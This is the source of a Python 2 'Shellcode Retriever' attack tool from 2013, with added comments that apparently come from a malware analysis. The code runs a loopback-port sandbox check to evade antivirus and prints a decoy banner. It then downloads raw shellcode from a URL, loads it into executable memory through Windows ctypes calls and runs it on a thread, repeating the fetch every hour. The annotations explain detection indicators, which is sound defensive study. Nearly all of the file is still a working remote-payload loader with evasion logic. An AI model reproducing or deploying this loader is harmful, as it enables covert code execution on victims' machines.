#!/usr/bin/env python
'''
Shellcode Retriever
Author Joshua Pitts the.midnite.runr 'at' gmail <d ot > com
Copyright (C) 2013, Joshua Pitts
License: GPLv3
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
See <http://www.gnu.org/licenses/> for a copy of the GNU General
Public License
This program is to be used for only legal activities by IT security
professionals and researchers. Author not responsible for malicious
uses.
'''
import socket
import sys
import urllib2
import ctypes
import time
import signal
# Set to True if you want to beacon every X seconds based
# on timesleep.
# NOTE(review): `retry` is only ever read by main() as the loop condition;
# nothing in this file changes it at runtime, and although `signal` is
# imported no handler is installed, so the loop ends only when the process
# is killed or an exception escapes get_and_execute().
retry = True
# time to sleep in seconds between fetches (3600 s = one hour)
timesleep = 3600
# Plain urllib2 opener with default handlers. urllib2 exists only in
# Python 2, so this file does not run under Python 3 (see also the print
# statement and `except Exception, e` syntax below).
opener = urllib2.build_opener()
def sandbox_check():
    """
    Quick sandbox check for additional av evasion.
    And a message to throw the user off.

    Heuristic: a real Windows host is assumed to have SMB (TCP 445) or the
    RPC endpoint mapper (TCP 135) listening on loopback. If a connect to
    127.0.0.1:445 fails and a connect to 127.0.0.1:135 also fails, a decoy
    banner is printed and the process exits with status 0 before anything
    is downloaded. Otherwise the function returns None and main() continues.

    Analysis notes: the probe is nothing more than two loopback TCP
    connects, so a listener on either port in an analysis VM is enough for
    the sample to proceed to get_and_execute(). The same socket object is
    reused for the second connect after the first one failed; whether that
    second connect can succeed at all after a failed connect is
    platform-dependent (TODO confirm on Windows). The socket is never
    closed on the failure path.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sandbox = True
    try:
        s.connect(('127.0.0.1', 445))
        s.close()
        sandbox = False
    except:
        # Bare except: any failure at all (refused, unreachable, timeout,
        # KeyboardInterrupt, ...) is treated as "we are in a sandbox".
        pass
    if sandbox == True:
        try:
            # Second chance: RPC endpoint mapper on the same socket object.
            s.connect(('127.0.0.1', 135))
            s.close()
        except:
            #Message to throw the user off:
            print "Clybase platform checker 2012\nYour platform is:", sys.platform
            sys.exit(0)
def allocate_exe(shellcode):
    """
    ctypes VritualAlloc, MoveMem, and CreateThread
    From http://www.debasish.in/2012_04_01_archive.html

    Copies `shellcode` (a bytearray) into a fresh executable heap region in
    the current process and runs it on a new thread, then blocks until that
    thread terminates.

    Analysis notes for detection / IR:
    - VirtualAlloc(NULL, len, 0x3000, 0x40): 0x3000 is MEM_COMMIT | MEM_RESERVE,
      0x40 is PAGE_EXECUTE_READWRITE. A private RWX region followed by a thread
      whose start address lies inside it is the textbook in-memory loader
      sequence that memory scanners and EDR telemetry key on.
    - RtlMoveMemory copies the payload; CreateThread starts it at `ptr`;
      WaitForSingleObject(ht, -1) waits INFINITE, so the caller does not
      return until the payload's thread exits.
    - No argtypes/restype are set; every HANDLE/LPVOID value is squeezed
      through ctypes.c_int, which only round-trips correctly in a 32-bit
      Python process (a 64-bit pointer would be truncated — TODO confirm).
    - Only works on Windows (ctypes.windll); on other platforms the first
      attribute access raises AttributeError.
    """
    ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
                                              ctypes.c_int(len(shellcode)),
                                              ctypes.c_int(0x3000),
                                              ctypes.c_int(0x40))
    # from_buffer needs a writable buffer, hence the bytearray built by the caller.
    buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
    ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
                                         buf,
                                         ctypes.c_int(len(shellcode)))
    ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
                                             ctypes.c_int(0),
                                             ctypes.c_int(ptr),
                                             ctypes.c_int(0),
                                             ctypes.c_int(0),
                                             ctypes.pointer(ctypes.c_int(0)))
    # -1 == INFINITE: block here until the payload thread ends.
    ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))
def get_and_execute(openurl):
    """
    Download the raw response body at `openurl` and hand it to allocate_exe().

    The whole body is read into memory and treated as shellcode as-is: there
    is no content-type, size, integrity or authenticity check, so whatever the
    server (or anyone able to tamper with the transport) returns is executed.
    From a network-monitoring point of view this is a single outbound HTTP(S)
    GET via a default urllib2 opener (default User-Agent) whose response is
    an opaque binary blob, repeated every `timesleep` seconds by main().
    Any urllib2/socket exception propagates to the caller.
    """
    info = opener.open(openurl)
    shellcode = info.read()
    # bytearray gives a writable buffer for ctypes from_buffer in allocate_exe.
    shellcode = bytearray(shellcode)
    allocate_exe(shellcode)
def main():
    """
    Entry point: run the sandbox heuristic, obtain a URL, then fetch and
    execute the payload once and again every `timesleep` seconds while
    `retry` is True.

    Behaviour worth noting for analysis:
    - With `openurl` left as '' the URL comes from an interactive
      raw_input() prompt, so this build is not fully unattended.
    - Because allocate_exe() waits INFINITE on the payload thread, each
      beacon iteration only starts after the previous payload has exited.
    - Every Exception raised during fetch/execute (DNS failure, HTTP error,
      refused connection, ctypes errors) is swallowed by the bare
      `except Exception, e: pass`, so the program simply exits quietly with
      status 0 and no output on any failure.
    """
    sandbox_check()
    #set a url below or leave as '' to manually enter
    openurl = ''
    if openurl == '':
        openurl = raw_input("Give me a url: ")
    try:
        get_and_execute(openurl)
        while retry is True:
            time.sleep(timesleep)
            get_and_execute(openurl)
    except Exception, e:
        #print str(e)
        # Silent swallow: no logging, no retry, normal exit.
        pass
# Script guard: run main() only when executed directly, not when imported.
if __name__ == "__main__":
    main()